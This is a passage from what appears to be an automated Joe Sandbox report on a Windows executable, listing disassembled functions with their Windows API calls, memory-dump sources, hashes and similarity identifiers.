                                                                                                                                  • Instruction Fuzzy Hash: F7110336100349AFDB25AF35C845E7A77F8FF88350B40A02AF806CB251EB329851D7A0
                                                                                                                                  Function 00EE713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE715C
                                                                                                                                  • _memset.LIBCMT ref: 00EE717D
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE71CF
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EE71D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1157408455-0
                                                                                                                                  • Opcode ID: 1d3751f30bd8736587cdf6ef37c443d73b38f9b5d2cc8c3e6617aff46b2522dc
                                                                                                                                  • Instruction ID: 637f46aa62e7ccf3edf4cc9c706e1022726a1690d42a0801458aa4ae851f9fe5
                                                                                                                                  • Opcode Fuzzy Hash: 1d3751f30bd8736587cdf6ef37c443d73b38f9b5d2cc8c3e6617aff46b2522dc
                                                                                                                                  • Instruction Fuzzy Hash: EB11CA7190132C7AE7305BA5AC4DFEBBABCEF45764F10419AF504E71D0D2744E818BA5
                                                                                                                                  Function 00EE13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EE13EE
                                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EE1409
                                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EE141F
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00EE1474
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3137044355-0
                                                                                                                                  • Opcode ID: 3f743ced9164220e23f24e7d8a62e0469b4f2a9cef33897b3493dc6b2d687c87
                                                                                                                                  • Instruction ID: d33a03b79339f072c805d291f0ddafcdb7211061c86127fc74c44ea8b81f2046
                                                                                                                                  • Opcode Fuzzy Hash: 3f743ced9164220e23f24e7d8a62e0469b4f2a9cef33897b3493dc6b2d687c87
                                                                                                                                  • Instruction Fuzzy Hash: 55217FB150034DAFDB20DF92DC88EDABBB8EF00744F4094A9A562A7290D774EA85DF51
                                                                                                                                  Function 00EDC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDC285
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC297
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC2AD
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EDC2C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 09bde982d5bfe51677f241e2c54066d912960b579a7d40d666695922d6a7e771
                                                                                                                                  • Instruction ID: d2497329a189e91e31e6614244946978c54408fb5058f6f1cb3f6d7a6cc5b0e6
                                                                                                                                  • Opcode Fuzzy Hash: 09bde982d5bfe51677f241e2c54066d912960b579a7d40d666695922d6a7e771
                                                                                                                                  • Instruction Fuzzy Hash: E011187A940219FFDB11DBD8CC85E9DBBB8FB08754F204092EA04B7294D671AE11DB94
                                                                                                                                  Function 00EBC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                  • Opcode ID: c7c071cf7ff660c0dfad7b0aad81455c25e15cb4fc9d49fd5a3e519db58aca2d
                                                                                                                                  • Instruction ID: 2f6e3a940f8d19a6d91a4744ebb29d5d8482269cf86cffa252d83489320e295f
                                                                                                                                  • Opcode Fuzzy Hash: c7c071cf7ff660c0dfad7b0aad81455c25e15cb4fc9d49fd5a3e519db58aca2d
                                                                                                                                  • Instruction Fuzzy Hash: AD11ADB250564CBFEB124FA08C40EEBBB69FF08764F151212FA04A2020C732DC60EBA0
                                                                                                                                  Function 00EE49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE49EE
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A13
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A1D
                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE354D,?,00EE45D5,?,00008000), ref: 00EE4A50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                  • Opcode ID: 0e2b9370117458cac6bc8974ae467b56afe83e62002db67c5deb320d47a517f0
                                                                                                                                  • Instruction ID: 7a35d39e3f32185151c45925bda92dac1a41f60c9e9da701c573eb8610dc7de9
                                                                                                                                  • Opcode Fuzzy Hash: 0e2b9370117458cac6bc8974ae467b56afe83e62002db67c5deb320d47a517f0
                                                                                                                                  • Instruction Fuzzy Hash: 7211CEB0C4055CDBDF04EFE2D989AEEBB74FF08321F005065E945B2280DB309560CB99
                                                                                                                                  Function 00ED5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                  • Instruction ID: 35c4f5bdcd742f5e46a66ff31f9fc6ab1977f27970b23b09faeb7236690153bb
                                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                  • Instruction Fuzzy Hash: DA01423300064EBBCF125E84DD41CED7F62FB58354B549816FA1869231D236C9B2AB81
                                                                                                                                  Function 00EC80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC869D: __getptd_noexit.LIBCMT ref: 00EC869E
                                                                                                                                  • __lock.LIBCMT ref: 00EC811F
                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00EC813C
                                                                                                                                  • _free.LIBCMT ref: 00EC814F
                                                                                                                                  • InterlockedIncrement.KERNEL32(01126CF0), ref: 00EC8167
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2704283638-0
                                                                                                                                  • Opcode ID: d78469bbb95894e684f404816e23eda50bec767117394c6d70e55b95c1808217
                                                                                                                                  • Instruction ID: 34b75785626c43d86c534e7a2833174bf644fef633a405152376a6319c04d2e8
                                                                                                                                  • Opcode Fuzzy Hash: d78469bbb95894e684f404816e23eda50bec767117394c6d70e55b95c1808217
                                                                                                                                  • Instruction Fuzzy Hash: D5018B319027159BCB21AF648B0AB9973E0BF0571AF08210DF91477291CB366C03DBD2
                                                                                                                                  Function 00EC8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 00EC8768
                                                                                                                                    • Part of subcall function 00EC8984: __mtinitlocknum.LIBCMT ref: 00EC8996
                                                                                                                                    • Part of subcall function 00EC8984: RtlEnterCriticalSection.NTDLL(00EC0127), ref: 00EC89AF
                                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00EC8775
                                                                                                                                  • __lock.LIBCMT ref: 00EC8789
                                                                                                                                  • ___addlocaleref.LIBCMT ref: 00EC87A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1687444384-0
                                                                                                                                  • Opcode ID: 97d828bd3ae937b8d96d139d771f65db603414cc0e668f205d6bb2ae0e51d962
                                                                                                                                  • Instruction ID: 3cb979c562938830a28acced1bad1e261ab5ed57f4da63a8225a3422ff4ad40c
                                                                                                                                  • Opcode Fuzzy Hash: 97d828bd3ae937b8d96d139d771f65db603414cc0e668f205d6bb2ae0e51d962
                                                                                                                                  • Instruction Fuzzy Hash: 50016D71400B009FD760EF65DB05B5AB7F0AF40326F20990EE59AA72A1DB71A645DF02
                                                                                                                                  Function 00F0E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0E14D
                                                                                                                                  • _memset.LIBCMT ref: 00F0E15C
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F63EE0,00F63F24), ref: 00F0E18B
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F0E19D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                  • Opcode ID: d13948659d937f09d548eba18937e6d1bd4b744d0adc38d50fa57c345396af60
                                                                                                                                  • Instruction ID: 66048753771e7af6e61bfc6c6ea7b86eab73e5cd034a4bc0120c049fb443858e
                                                                                                                                  • Opcode Fuzzy Hash: d13948659d937f09d548eba18937e6d1bd4b744d0adc38d50fa57c345396af60
                                                                                                                                  • Instruction Fuzzy Hash: C5F082F1A40308BFF2105B65AC06F777AACDB0A394F000421FA14E51A2D7F78E11A6B4
                                                                                                                                  Function 00F0E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                    • Part of subcall function 00EBB58B: BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0E860
                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00F0E86D
                                                                                                                                  • EndPath.GDI32(00000000), ref: 00F0E87D
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 00F0E88B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                  • Opcode ID: 5ae77bfa1e5b97a8f10e9d69dc0e041cbe8ca0fbd25ee8bca2e223af2220f9ef
                                                                                                                                  • Instruction ID: 27313c4ec3da5f4ee83c6ddb3ba4278dcaf734224d3cd7e4da5dd466eab12454
                                                                                                                                  • Opcode Fuzzy Hash: 5ae77bfa1e5b97a8f10e9d69dc0e041cbe8ca0fbd25ee8bca2e223af2220f9ef
                                                                                                                                  • Instruction Fuzzy Hash: 85F05E3100525DBBDB265F54AC09FCE3FA9AF06321F048101FA11210F187B55562EFA5
                                                                                                                                  Function 00EDD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDD640
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDD653
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDD65A
                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00EDD661
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                  • Opcode ID: 1e912c6c1f47b84302ffdf786bcab427513d5e769ac1a5f0272e897347097ce9
                                                                                                                                  • Instruction ID: 22598e40e8f68db359849497b45ec967753ffd02072c340ef0f703f89a240afa
                                                                                                                                  • Opcode Fuzzy Hash: 1e912c6c1f47b84302ffdf786bcab427513d5e769ac1a5f0272e897347097ce9
                                                                                                                                  • Instruction Fuzzy Hash: C5E03971109228BBEB311BA2DC0DEDB7F1CEF117A1F008011B51CA5460CA71D582DBE0
                                                                                                                                  Function 00EBB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00EBB0C5
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00EBB0CF
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00EBB0E4
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00EBB0EC
                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00F1ECFA
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F1ED07
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00F1ED20
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00F1ED39
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F1ED59
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1ED64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                  • Opcode ID: 87ffbd12a6b52cfc93b658520aa9c5fd20aedeb7bfb2df88be0fa807c66028f9
                                                                                                                                  • Instruction ID: 3e6f63be77d4bb0d926a682bcfc3b8dac869d2f2a91b7616941b454bfc4b7559
                                                                                                                                  • Opcode Fuzzy Hash: 87ffbd12a6b52cfc93b658520aa9c5fd20aedeb7bfb2df88be0fa807c66028f9
                                                                                                                                  • Instruction Fuzzy Hash: 0AE0ED31500244AEEB315F78AC4D7D97B21AB5533AF148266FA69580E2C7B18991EB11
                                                                                                                                  Function 00F1C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
